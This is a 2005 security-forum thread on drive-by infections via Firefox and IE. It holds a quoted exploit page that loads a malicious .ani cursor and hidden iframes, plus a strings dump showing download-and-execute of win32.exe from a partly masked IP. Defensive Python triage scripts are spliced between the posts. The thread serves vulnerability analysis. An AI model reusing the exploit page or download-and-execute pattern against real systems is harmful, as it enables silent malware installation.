Firefox and spyaxe

Discussion in 'other security issues & news' started by Mrkvonic, Dec 4, 2005.

Thread Status:
Not open for further replies.
  1. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,695
    Hello,

    I read and replied to this thread at Spyware Warrior:

    http://spywarewarrior.com/viewtopic.php?t=18115

    Long story short, a guy asks about the safest browser. In return to replies about Firefox and Opera, he is directed to a blog entry from a guy who says he got infected with spyaxe while innocently surfing with Firefox.

    I find it hard to believe. And I responded in the thread. I also think this could not have happened alone. Not without a click on a 'yes'.

    Would anyone care to set up an experiment in a virtual machine and try to simulate this? I really find it hard to believe that you can get infected using Firefox in this fashion. An active response from the user must have been triggered.

    I would appreciate comments and suggestions.

    Mrk
     
  2. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    I find it really hard to believe too. A malware installation through a 0-day exploit in Firefox? Never heard of one. Of course I'm not saying this can't happen (Firefox is hardly the most secure piece of software in the world), but really... let's distinguish between installation through exploits and through user interaction. I didn't see anything in this thread that made me believe that this was an installation through a Firefox exploit.
     
  3. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Hi Mrk,

    You may remember the URL posted a while back for people to try, where just going to the site triggered a download. It didn't work in Opera, because it didn't respond to the {CURSOR} or <iframe> tag - I don't know which. Here's the code from the page:

    ___________________________________________________
    <html>
    <head>
    <title>eXploit combo v1.1</title>
    <style>
    * {CURSOR: url("./exp_2/1.ani");}
    </style>
    </head>
    <body>

    <iframe src="./exp_4/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->

    <iframe src="./exp_sp6/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->

    <iframe src="./exp_3/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->

    </body>
    </html>
    __________________________________________________________

    However, using IE6, an attempted download started immediately, with no user action:

    http://www.rsjones.net/img/exploit.gif
    _______________________________________________________________

    This shows that drive-by downloads are possible. (Win32[1].exe was the trojan downloader executable).

    There are other script methods that may have gotten by Firefox. Without seeing the code, we don't know what happened in the case you refer to.

    I would never completely trust the browser, and would have something else in place to deal with situations like this.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
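The page Rmus quoted is worth running through a static extractor, because what makes it a drive-by is that every resource it references is requested by the browser on render, with nothing to click: the CSS `CURSOR: url(...)` declaration pulls the .ani file, and each `<iframe src>` loads a further page. The script below is an added example, not code from the thread or from the site under discussion. It walks an HTML document and lists the URLs a browser fetches automatically, with the tag or declaration that triggers each, resolved against a base URL. The base URL `http://example.invalid/exploit/index.htm` is a placeholder; the sample page is the HTML quoted in the post above.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urljoin

# Tag/attribute pairs the browser fetches as soon as the page renders, with no
# user action. Conservative list; extend as needed.
AUTO_FETCH_ATTRS = {
    "iframe": "src", "frame": "src", "img": "src", "script": "src",
    "embed": "src", "object": "data", "link": "href",
}
# A cursor declaration in CSS makes the browser fetch the cursor file (.ani/.cur).
CSS_CURSOR = re.compile(r"cursor\s*:\s*([^;}]+)", re.IGNORECASE)
CSS_URL = re.compile(r"url\(\s*['\"]?([^'\")]+)['\"]?\s*\)", re.IGNORECASE)


class AutoLoadExtractor(HTMLParser):
    """Collect (trigger, absolute_url) for every resource loaded without a click."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.in_style = False
        self.resources = []

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "style":
            self.in_style = True
        attr = AUTO_FETCH_ATTRS.get(tag)
        if attr and attrs.get(attr):
            self.resources.append((f"<{tag} {attr}>", urljoin(self.base_url, attrs[attr])))
        if attrs.get("style"):  # inline style="cursor: url(...)" is fetched too
            self._scan_css(attrs["style"], f"<{tag} style=cursor>")

    def handle_endtag(self, tag):
        if tag == "style":
            self.in_style = False

    def handle_data(self, data):
        # HTMLParser hands the body of <style> to handle_data as raw text.
        if self.in_style:
            self._scan_css(data, "<style> cursor")

    def _scan_css(self, css, trigger):
        for declaration in CSS_CURSOR.findall(css):
            for url in CSS_URL.findall(declaration):
                self.resources.append((trigger, urljoin(self.base_url, url)))


def auto_loaded_resources(html, base_url):
    """Return [(trigger, absolute_url), ...] in document order."""
    parser = AutoLoadExtractor(base_url)
    parser.feed(html)
    parser.close()
    return parser.resources


# Placeholder base URL; the page itself is the one quoted in the thread.
BASE_URL = "http://example.invalid/exploit/index.htm"
SAMPLE_PAGE = """<html>
<head>
<title>eXploit combo v1.1</title>
<style>
* {CURSOR: url("./exp_2/1.ani");}
</style>
</head>
<body>
<iframe src="./exp_4/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->
<iframe src="./exp_sp6/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->
<iframe src="./exp_3/index.htm" width=40 height=40></iframe> <!-- sp0 exp -->
</body>
</html>"""

if __name__ == "__main__":
    for trigger, url in auto_loaded_resources(SAMPLE_PAGE, BASE_URL):
        print(f"{trigger:20} {url}")
```

Run it on a saved copy of a suspect page and every URL it prints is something the browser would request on its own; those are the files to pull down and look at in a VM, which is exactly the .ani and the three frame pages in this case.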
     
  4. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Well, it seems like it started much more than just a download... the execution was launched (and then blocked by anti-executable). Just curious, did you click "OK" or anything and are you fully patched with the latest patches for your OS? 'Cause otherwise this is CLEARLY a working unpatched exploit in IE.
     
  5. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    I didn't click anything.

    Using IE6 I went to the site again and observed more closely.
    This line in the code I posted executes the 1.ani file:

    * {CURSOR: url("./exp_2/1.ani");}

    http://www.rsjones.net/img/exploit2.gif
    _________________________________________________


    The ASCII strings from this file:
    _________________________________________
    GetProcAddress
    LoadLibrary
    GetSystemDirectory
    urlmon.dll
    URLDownloadToFile
    WinExec xxxx 195.xxx.xxx.xx/vx/win32.exe
    __________________________________________

    which downloads the executable. All done w/o any clicking. There is nothing to click -
    it's a blank web page except for the empty frames at the top:

    http://www.rsjones.net/img/exploit4.gif

    I use IE6 unpatched for testing, so that I can observe how these exploits work.

    But the thread is about Firefox, and the assumption was that there had to be user intervention,
    and I'm just showing that it's possible for a web site to execute script w/o any user action,
    and w/o testing the site and viewing the code, looking at the security settings of the browser,
    you can't make a blanket statement that the Spyaxe scenario couldn't have occurred using Firefox.

    Which is why I don't trust the browser to control scripts. There is always a new exploit just
    waiting to be discovered.

    Having something else behind the browser to block carrying out of such an exploit is a necessary safeguard, IMO.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  6. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    I didn't; all I was saying is that I am unaware of current Firefox exploits of this kind in the wild.

    And BTW there's a HUGE difference between a file getting downloaded and getting executed, don't you think? Did you know that in Firefox files are being downloaded in the browser cache while you're looking at the prompt before you even decide that you actually want to download the file? That's true. Except that's not an exploit at all, since the file doesn't get executed.
    I agree, but that doesn't mean a browser should execute files as it feels like. Executing a file without user intervention is an exploit, there is no doubt about it. An absolutely unacceptable behavior, and I am actually relieved to see that your IE was unpatched, otherwise it would mean we actually found in the wild another exploit taking advantage of an unpatched IE vulnerability.
     
    Last edited: Dec 4, 2005
  7. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    I realize what you are saying but for correctness let's speak of vulnerabilities in regards to IE. These vulnerabilities can be exploited in an unpatched or an improperly secured IE via Active script....which is the majority of the vulnerability vector.
     
  8. TNT

    TNT Registered Member

    Joined:
    Sep 4, 2005
    Posts:
    948
    Uhmmm... ok. An "exploit taking advantage of an unpatched IE vulnerability". :D
     
    Last edited: Dec 4, 2005
  9. Bubba

    Bubba Updates Team

    Joined:
    Apr 15, 2002
    Posts:
    11,271
    correct....or a user not knowing how to properly secure their browser :eek:

    As for the Firefox issue concerning this thread....it would be great if we knew everything about how and where users are coming across this malware. In some ways it would help to some degree in regards to all those great browser hijack volunteers. All we can do is educate each other no matter what program we are speaking of and no one regardless of what browser they use should ever get too warm and fuzzy of a feeling unless they do understand how they can be had while surfing.
     
  10. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    OK, sorry, I re-read what you wrote :doubt:

    Yes, and that's the normal behavior in all browsers, AFAIK. This is IE in a normal download:

    http://www.rsjones.net/img/exploit_IEdl.gif
    ____________________________________________________________

    But on the other site, if I turn off all other security programs and let everything run to completion, you will see that IE hangs with the status bar showing the downloading of the 1.ani file:

    http://www.rsjones.net/img/exploit8.gif
    _____________________________________________________________

    However, that .ani file has already downloaded and cached, as I showed in the previous post. A fake error message displayed briefly (you see the yellow ! in the Status Bar).

    Meanwhile, the Win32.file you saw in the cache has copied itself into System32 as Service.exe, and there was no prompt by the browser to Open|Save|Cancel Win32.exe:

    http://www.rsjones.net/img/exploit7.gif
    ______________________________________________________

    So, I don't know if this is peculiar to IE or not. I could not even get the page to dl the .ani file in Opera, so I couldn't test Opera, and I've not found anyone else set up to let everything run.

    Again, the fact that an exploit like this is possible is enough to make me leery of relying on the browser alone to alert for unwanted downloading of executables.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
    Last edited: Dec 4, 2005
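Rmus's observation that Win32.exe ended up in System32 as Service.exe with no Open|Save|Cancel prompt is only visible if you snapshot the system before visiting the page and compare afterwards, which is the virtual-machine experiment Mrk asked for at the top of the thread. The script below is an added example, not code from the thread: it records size, modification time and SHA-256 for every file of a watched type (executables, libraries, cursor files) under a set of directories, and reports what was added, changed or removed between two snapshots. The directories are whatever you pass in; `demo()` uses a temporary directory standing in for System32, and the files it writes there are placeholders, not real binaries.

```python
import hashlib
import os
import tempfile
from pathlib import Path

# File types worth watching on a Windows test box; extend as needed.
WATCH_SUFFIXES = {".exe", ".dll", ".sys", ".scr", ".ani", ".cur", ".com", ".pif"}


def _sha256(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(1 << 16), b""):
            h.update(block)
    return h.hexdigest()


def snapshot(roots, suffixes=WATCH_SUFFIXES):
    """Map path -> (size, mtime_ns, sha256) for every watched file under roots."""
    state = {}
    for root in roots:
        for dirpath, _, filenames in os.walk(root):
            for name in filenames:
                p = Path(dirpath) / name
                if p.suffix.lower() not in suffixes:
                    continue
                try:
                    st = p.stat()
                    state[str(p)] = (st.st_size, st.st_mtime_ns, _sha256(p))
                except OSError:
                    continue  # vanished or unreadable; normal on a live system
    return state


def diff_snapshots(before, after):
    """Compare two snapshots by content hash, not just mtime (mtimes can be forged)."""
    added = sorted(p for p in after if p not in before)
    removed = sorted(p for p in before if p not in after)
    changed = sorted(p for p in after if p in before and after[p][2] != before[p][2])
    return {"added": added, "changed": changed, "removed": removed}


def report(delta):
    lines = [f"{kind.upper():8} {p}" for kind in ("added", "changed", "removed") for p in delta[kind]]
    return "\n".join(lines) if lines else "no watched files added, changed or removed"


def demo():
    """Self-contained run: a temp dir stands in for System32. Returns basenames."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "kernel32.dll").write_bytes(b"pretend system dll")      # placeholder
        (root / "notes.txt").write_bytes(b"not a watched file type")     # ignored
        before = snapshot([root])
        # ... visit the page in the VM here; the next two lines stand in for the drop ...
        (root / "Service.exe").write_bytes(b"MZ placeholder, not a real binary")
        (root / "kernel32.dll").write_bytes(b"pretend system dll, overwritten")
        delta = diff_snapshots(before, snapshot([root]))
        return {k: [Path(p).name for p in v] for k, v in delta.items()}


if __name__ == "__main__":
    print(report(demo()))
```

On a real test box you would call `snapshot([r"C:\Windows\System32", ...])` before opening the page, again after the browser has finished, and feed both to `diff_snapshots`; an executable that appears in System32 without any prompt is the result Rmus describes, and the hash lets you match it against what landed in the browser cache.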
  11. Mrkvonic

    Mrkvonic Linux Systems Expert

    Joined:
    May 9, 2005
    Posts:
    8,695
    Hello,
    I remember that page. And I remember trying it. Nothing happened. Simply nothing. With Firefox, that is.
    However, in this case, according to all posts given, I believe the user did click something - and thus circumvented Firefox's inherent security. But that's the same as ignoring anti-virus, closing your firewall, clicking allow in a HIPS etc. I do not know of an exploit that after you simply visit a page using Firefox, your IE is hijacked, you get popups etc.
    And EVEN if such one exists, assuming that the English Guy only innocently browsed, although paperghost does say there's a warning about the expired certificate, plus clicking 'yes', we do not know about the user's:
    version of Firefox and possible conflicts between versions
    version of Java and possible conflicts between versions
    O/S and the status of patches
    old MS Java
    All in all, it leaves a strange taste...
    I sometimes do happen to run across malicious pages, when I browse adult content, but this is nothing special: pages try to download stuff, so you get prompted to download. Just click 'cancel', and it's blocked. Other times, it's javascript, things like (javascript: execute.exe) hidden behind a would-be image or alike, but using Noscript turns things into nothing more than static background images with captions. I wonder how these would behave in IE.
    But either way, it requires a user to click, click, click, pull the trigger.
    Blank page, just visit and get infected? Find it hard to believe.
    Mrk
     
  12. que sera

    que sera Guest

    Well, I'm running FF, so does this mean with java script enabled I would get infected if I go to a site that contains a spyaxe script, even without having to agree to download or install something?
    I'd like to figure it out myself but unlike every Jack and Joe who unintentionally gets his box infected I don't know where to pick up this little nasty. :(
    Am I allowed to ask for mailing me an URL (and don't worry, I do have VMware available to play with so there would be no risk)?

    Regards,
    qs
     
  13. This holds if you are using Javascript and Java too right?
     
  14. Really? I thought it was for firefox only. Your screenshot doesn't show this to be the case for IE BTW. What TNT means is that you click on a link to a file download, and while waiting for your response to save it to disk, the file downloads anyway.

    Is this the case for IE too? The way to test it would be to look for a big file to download, click on it, wait for a while, then accept. The download should be instant or at least much faster.
     
  15. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Here is the thread where this URL was posted - see third post. Note the warnings about having a secure setup before going to the site.

    https://www.wilderssecurity.com/showthread.php?t=98653

    What was interesting was how many different results there were, depending on what security programs each person was running.

    Note Edwin024's comment that the page did nothing using Opera - that was my result also. I had to use IE to get the code to run.

    TNT and others did a good analysis of some of the files.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  16. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Well, live and learn... I knew it is the case for Firefox and Opera (which I use) and *assumed* it was for IE. In trying what you suggested, you are right - it doesn't behave like FF and Opera.

    But the point I was making in the earlier post was that there was *no* prompt at all to dl the Win32.exe file - the file downloaded in the background.

    I re-did my test of that site to show how that was done, and since it's a bit off topic of this thread (it applies to IE), I've put it back in the other spyware site thread which discussed the site:

    https://www.wilderssecurity.com/showthread.php?p=624496#post624496

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  17. Yeah no biggie.

    Well yeah that's a different point. It's one thing for websites to make you 'download' stuff in the browser cache (whether firefox or IE), it's another to completely replace files in c:\windownt\system32 without user interaction.

    So it's some kind of exploit, I think.
     
  18. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Yes that web site exploits the animated cursor vulnerability in IE, OE, Outlook. If allowed to run, the .ani file downloads the win32.exe file and copies to system32.

    According to Microsoft, WinXP SP2 is not vulnerable. Prior to that requires a patch. There are worse things that a cursor or icon file can do. See Microsoft Security Bulletin MS05-002

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
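To make the mechanism concrete: an .ani file is a RIFF container of form type ACON, and the anih chunk inside it carries a fixed 36-byte ANIHEADER (nine DWORDs). The MS05-002 flaw Rmus refers to was that the cursor loader trusted the chunk's declared length when copying that header into a fixed-size buffer, so an anih chunk claiming more than 36 bytes overruns it and the bytes that follow get executed, which is how a page that merely sets a cursor can run a downloader. The script below is an added example, not from the thread, Microsoft or eEye. It builds two constructed ANI files, one well-formed and one with an oversized anih chunk whose body is filler followed by the same download-and-execute API names Rmus pulled out of 1.ani, then walks every chunk (descending into LIST chunks, so an anih chunk that is not the first one is still checked), flags any anih chunk whose length is not 36 or that runs past the end of the file, and lists the API strings present. The filler is not shellcode; this is a triage check, not an exploit.

```python
import struct

ANIHEADER_SIZE = 36  # nine little-endian DWORDs; the size of the loader's fixed buffer
# API names a download-and-execute payload resolves at runtime (cf. the strings
# dumped from 1.ani earlier in the thread).
DOWNLOAD_EXEC_APIS = (
    b"LoadLibrary", b"GetProcAddress", b"GetSystemDirectory", b"urlmon.dll",
    b"URLDownloadToFile", b"WinExec", b"ShellExecute", b"CreateProcess",
)


def riff_chunk(fourcc, body):
    """Encode one RIFF chunk: fourcc, little-endian length, body padded to even."""
    return fourcc + struct.pack("<I", len(body)) + body + (b"\x00" if len(body) % 2 else b"")


def build_ani(anih_body, extra_chunks=b""):
    """Constructed minimal RIFF/ACON file wrapped around a given anih chunk body."""
    inner = b"ACON" + riff_chunk(b"anih", anih_body) + extra_chunks
    return b"RIFF" + struct.pack("<I", len(inner)) + inner


def iter_chunks(data, start, end):
    """Yield (fourcc, declared_size, body_offset) for the chunks in data[start:end]."""
    pos = start
    while pos + 8 <= end:
        fourcc = data[pos:pos + 4]
        size = struct.unpack_from("<I", data, pos + 4)[0]
        yield fourcc, size, pos + 8
        pos = pos + 8 + size + (size & 1)  # an absurd size simply ends the walk


def analyze_ani(data):
    """Triage one cursor file: anih sizes seen, findings, API strings, verdict."""
    result = {"is_ani": False, "anih_sizes": [], "findings": [],
              "api_strings": [], "suspicious": False}
    if len(data) < 12 or data[:4] != b"RIFF" or data[8:12] != b"ACON":
        result["findings"].append("not a RIFF/ACON container")
        return result
    result["is_ani"] = True
    end = min(len(data), 8 + struct.unpack_from("<I", data, 4)[0])

    def walk(start, stop):
        for fourcc, size, body in iter_chunks(data, start, stop):
            if body + size > stop:
                result["findings"].append(
                    f"{fourcc!r} chunk declares {size} bytes but only {stop - body} remain")
            if fourcc == b"anih":
                result["anih_sizes"].append(size)
                if size != ANIHEADER_SIZE:  # every anih chunk is checked, not only the first
                    result["findings"].append(
                        f"anih chunk declares {size} bytes; ANIHEADER is {ANIHEADER_SIZE} (MS05-002 pattern)")
            elif fourcc == b"LIST" and body + 4 <= stop:
                walk(body + 4, min(stop, body + size))  # skip the list-type fourcc

    walk(12, end)
    result["api_strings"] = [s.decode() for s in DOWNLOAD_EXEC_APIS if s in data]
    result["suspicious"] = bool(result["findings"]) or len(result["api_strings"]) >= 2
    return result


# Constructed samples: a sane 36-byte header, and a 226-byte anih body (filler
# plus API names) that a length-trusting loader would copy over its 36-byte buffer.
BENIGN_ANI = build_ani(struct.pack("<9I", ANIHEADER_SIZE, 1, 1, 32, 32, 32, 1, 10, 1))
MALFORMED_ANI = build_ani(b"\x90" * 200 + b"URLDownloadToFile\x00WinExec\x00")

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_ANI), ("malformed", MALFORMED_ANI)):
        print(label, analyze_ani(blob))
```

Point it at the .ani a suspect page references (the one the cursor extractor turns up) before anything loads it; a length other than 36 on any anih chunk is the tell, and download-and-execute imports in a cursor file have no legitimate reason to be there.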
     
  19. que sera

    que sera Guest

    Hi Rmus,

    thanks for helping me out. :) I did some experimenting with FF 1.0.7 and the new 1.5 but wasn't able to get my computer infected with spyaxe via that website. I'm really curious what the English guy did to get that stuff.
    The testbox runs XPpro SP1 without any security software at all so when using IE I got infected immediately but had to allow at least active scripting. I got the full dose of crap when also allowing ActiveX to run.

    Regards,
    qs
     
  20. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    I don't think you can ever know unless he posted step-by-step what happened.

    We feel secure that our programs are patched up-to-date and that we are protected. Then along comes something to throw doubt into that thought.

    In the situation referenced in the spyware site thread, this from an eeye.com advisory:
    ___________________________________________________________
    In the case of Internet Explorer, the user's system will be compromised
    when the user views a website that shows a malformed ANI file referenced
    via a style sheet in the HTML file.
    ___________________________________________________________


    It's not unusual to see statements like this in security bulletins
    (this one from Sophos Labs):
    ___________________________________________________________
    The security vulnerability, which is not yet patched by Microsoft,
    allows hackers to run malicious software (such as a Trojan, virus or worm)
    on a user's machines when they visit a website containing the exploit code.

    "Microsoft will be fuming that the security of their software is being brought
    into question before they have had a chance to issue a security patch," said
    Graham Cluley, senior technology consultant for Sophos.

    "It wouldn't be a surprise if more malware was distributed that took advantage
    of this vulnerability in Microsoft's code."
    ____________________________________________________________


    Even vulnerabilities in Opera and Firefox occur, albeit pretty quickly patched.

    I think Bubba's previous comment is worth repeating:

    "All we can do is educate each other no matter what program we are speaking of and no one regardless of what browser they use should ever get too warm and fuzzy of a feeling unless they do understand how they can be had while surfing."

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  21. Just as I thought, Remus.

    Nothing new. I always get confused by your posts about tests since I never know if you are running fully patched or not.
     
  22. It's quite interesting that moving a mouse cursor is enough to get you infected.
    I seem to recall a similar firefox bug related to this one.

    So sometimes when someone tells you he didn't click on anything or do anything else, he might not be absolutely 100% correct. :)

    I think it's still a serious exploit if it requires javascript to work. Default out-of-box settings turn it on, no?
     
  23. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    In the case I mentioned, it doesn't require moving the mouse - I tried just to be sure. It's Remote Code Execution that begins as soon as you load the page, triggering the downloading of the cursor (.ani) file. Doesn't need any scripting - as I had all scripting disabled anyway. Here's Microsoft writeup:

    Vulnerability in Cursor and Icon Format Handling Could Allow Remote Code Execution

    True, this is an old exploit and pretty well patched by now, but it demonstrates that code execution w/o any user action is possible; there may be other methods of remote code execution just waiting to be discovered.

    Which is why I go back to my original thought of not depending solely on the browser to prevent unwanted stuff from getting into your system, since it's been demonstrated that it's possible to bypass browser security.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     
  24. Very old news, Remus. But I do enjoy reading posts where you learn something new to you and you present it like something revolutionary. :)

    This can be confusing, since a lot of times we think you are claiming something more or new , in this thread for example TNT had this problem. :)
     
  25. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    Well, I did say it was an old example, but still shows how Remote Code Execution works. It's the only site I had available to demonstrate.

    But hark! a new example, if we can just find a site to test:

    Malicious Website / Malicious Code: Zero-day IE Exploit Update II

    "The websites discovered so far are using the vulnerability to install potentially unwanted software without the end-user's consent."

    Note the word install. Easily preventable, not by the browser, but by protection behind the browser, which is my point in all of this.

    And for Firefox:

    First Vulnerability for Firefox 1.5

    but probably will be fixed soon.

    regards,

    -rich
    ________________
    ~~Be ALERT!!! ~~
     